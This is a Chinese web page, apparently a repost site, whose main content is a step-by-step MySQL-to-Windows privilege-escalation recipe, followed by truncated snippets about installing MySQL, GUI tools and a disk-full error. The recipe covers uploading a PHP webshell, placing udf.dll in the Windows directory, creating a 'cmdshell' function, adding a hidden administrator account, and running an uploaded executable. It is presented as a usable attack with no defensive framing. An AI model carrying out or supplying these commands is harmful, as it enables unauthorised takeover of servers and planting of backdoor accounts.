Mysql提权
(1)获取Mysql数据库的root用户密码和数据库用户名
(2)上传提权php木马,通过连接3389可以知道服务器是2003系统
(3)udf.dll对应操作系统
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
(4)设置相应的路径后直接导出。
(5)执行以下命令
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user simeon$ 123456 /add');
select cmdshell('net localgroup administrators simeon$ /add');
select cmdshell('c:\simeon.exe'); 运行simeon.exe
drop function cmdshell; 删除函数
select cmdshell('netstat -an'); 这是查看端口查开放情况
相关文档:
1、下载MySQL免安装版/二进制版软件(不用编译)
文件格式:MYSQL-VERSION-OS.tar.gz
2、创建MySQL组,建立MySQL用户并加入到mysql组中
(不同版本的Unix中,groupadd和useradd的语法可能会稍有不同。)
#groupadd mysql
#useradd -g mysql mysql
3、进入目录/usr/local,解压缩免安装版,并在 ......
前言
MySQL GUI工具很多,本文就常用的Navicat for MySQL与MySQL GUI Tools的特色功能做一个详细介绍与比较。
(一)MySQL GUI Tools
MySQL官方提供的一个可视化界面的MySQL数据库管理控制台,提供了四个图形化应用程序,这些图形化管理工具可以大大提高数据库管理、备份、迁移和查询效率。它们分别是: ......
Linux安装Mysql+Apach+PHP+phpMyAdmin
我的系统是redhat as5 建议大家完全安装,以免安装时缺少相关的编译器等等。
一、安装mysql(mysql-5.0.21.tar.gz)
# tar zxf mysql-5.0.21.tar.gz
# cd mysql-5.0.21
#./configure --prefix=/usr/local/mysql --sysconfdir=/etc --lo ......
今天一大早,领导给我打电话,说系统进不去了,报个Got error 28 from storage engine的错误。
看到这个错误,应该不是昨天更新程序造成的。看起来是MYSQL出问题了。用mysql的客户端软件navicat尝试连接数据库,得到同样的错误。
百度一下,发现有人遇到此错的原因是磁盘空间满了,SSH上到服务器,果然发现根目录已满。清 ......
